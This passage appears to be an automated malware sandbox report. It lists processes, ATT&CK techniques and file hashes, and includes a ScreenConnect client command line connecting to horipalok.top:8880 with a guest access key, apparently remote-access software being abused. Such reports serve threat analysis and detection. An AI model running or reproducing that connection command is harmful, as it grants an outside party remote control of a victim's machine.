C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005A8" "00000000000005DC"1⤵PID:1448
-
C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=ad6ebbe3-e789-4058-b8c7-24af2c9e25ee&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"1⤵PID:3752
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter 1
PowerShell 1
Scheduled Task/Job 1
Scheduled Task 1
Persistence
Boot or Logon Autostart Execution 2
Active Setup 1
Registry Run Keys / Startup Folder 1
Create or Modify System Process 4
Windows Service 4
Scheduled Task/Job 1
Scheduled Task 1
Privilege Escalation
Boot or Logon Autostart Execution 2
Active Setup 1
Registry Run Keys / Startup Folder 1
Create or Modify System Process 4
Windows Service 4
Scheduled Task/Job 1
Scheduled Task 1
Defense Evasion
Impair Defenses 5
Disable or Modify Tools 5
Modify Registry 8
Virtualization/Sandbox Evasion 2
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8452S9S3\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
Filesize22KB
MD5dbb90d8ccf95ca2e25467dda4deae171
SHA19629d09401e1745410d91a38c7dc2b4b1bcc53d7
SHA256a9e07aea216fe69a21c3eb1f24e94f27b320374cde9385c4bb15823cd5ef9758
SHA51294ae715d4ed903b94af6482ec6bdcc9c080aa6603a7b108d6bc5870b8e399ee958b30ea0fe5bde92ff410ff8e9795e672012bd4293e96ac3c55a2d38b42db096
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXR9LTPWD6M26Y7O4X8E.temp
Filesize7KB
MD509fd56f53cdac79f6e70220125f63204
SHA195155ca2687c3675907525bc4595f13830b918e6
SHA256ef9940d72831b8578526ae39b05c8a90468cd0b0b21df51312e82c00f61eaa21
SHA5120e5f6b1e45526beaf3fac700e13805b9b8d7cb77fbce5104ce9abe5459fb43dd5c7c149c3e5e28f467e188dc4d2ea87de2a1a1f3c6b3ef9de18094edc27661fa
-
Filesize
931B
MD5fa57b260181d357c59ad137c9d5bddbf
SHA19510451d68cc9bbd995579ddd722bf5b8ed2bc8c
SHA256219df133615a7e5f5775e31309fca439bd8a79f83fe87fce92e30f1ad39b8693
SHA51281f04e9fd9c4db25cb5d5304fdf51f63beb09f30b638615774039534056091e0e567e23fb064eb8a64085251a54b75d6637bcc5949d3ad04056e3e9adf7cdec7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD593ea704f8914fff5185ce93fb3abd0ba
SHA1dd164c3d8946ad683b1f4fb78f0397115dd663e2
SHA256383054d4d22c74dce60a15c226f1c9d293faff4411dc551eaa74d58fe1499f16
SHA51256516a9984a62a33768e7a2afa2083b8a71e1ce61c2b1c94c82435ad8f842d1662eb25b9e5f56ea7641c82a3b7f917c512d610753c0883076222b56ab02c1904
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\38ecd045-d4a0-47f4-9baf-f82f87791911
Filesize12KB
MD59f510af8971f2b525f4904db5cd36ed6
SHA12ed7a21610daaccb3992024c19c83eabfe420b1d
SHA2566e876862815b3d822d0cfe3004a46600911f873c17520633f94be455f3a23dae
SHA51263c5bc83a5fdb4c98c709c68fc634f80b523a7d42eaa3b047db4d4ffab9b1f2a21503b960199bc9b84f25bf0fc88305d7144e5936cf1374658a9fa975f2df88b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\44ad7177-ee6e-47b1-9a27-feaf9c35faf3
Filesize745B
MD546b7d4387e9ee297f21e11b2fd6082ba
SHA12ca5d73b752279e02bd771f8ca0476abb71175aa
SHA256f81a2c5c8ddf78f37346492c5b98d822c71ae11e618cd2f86357f8786979b90d
SHA5127d5497f8442e14058d5501fed10870182fa8065e9861216eec392b5d58475ce682dedcd4822cd595d2ab4444b643fbe51367a75e2436c61fde86435e7d91fc35
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json
Filesize372B
MD56981f969f95b2a983547050ab1cb2a20
SHA1e81c6606465b5aefcbef6637e205e9af51312ef5
SHA25613b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665
SHA5129415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll
Filesize10.2MB
MD554dc5ae0659fabc263d83487ae1c03e4
SHA1c572526830da6a5a6478f54bc6edb178a4d641f4
SHA25643cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
SHA5128e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
Filesize1KB
MD5dea1586a0ebca332d265dc5eda3c1c19
SHA129e8a8962a3e934fd6a804f9f386173f1b2f9be4
SHA25698fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
SHA5120e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5be55a97c738ea75d76e787a62e595f2b
SHA1355917899ba8349b9f789b9faa635a0ff3eef176
SHA2567821034e6b623ac56c2570230fe4bfeb68566b9e681235466de5c9123ff78206
SHA512957ed5954a4c5f797c5ef58648cc2b66e8a55625ac7c6bc3b1d06e770239244b2d2bb9189f0b8daf81361e386e612b3fcc9e4305b1759fabdc9813db42e6c964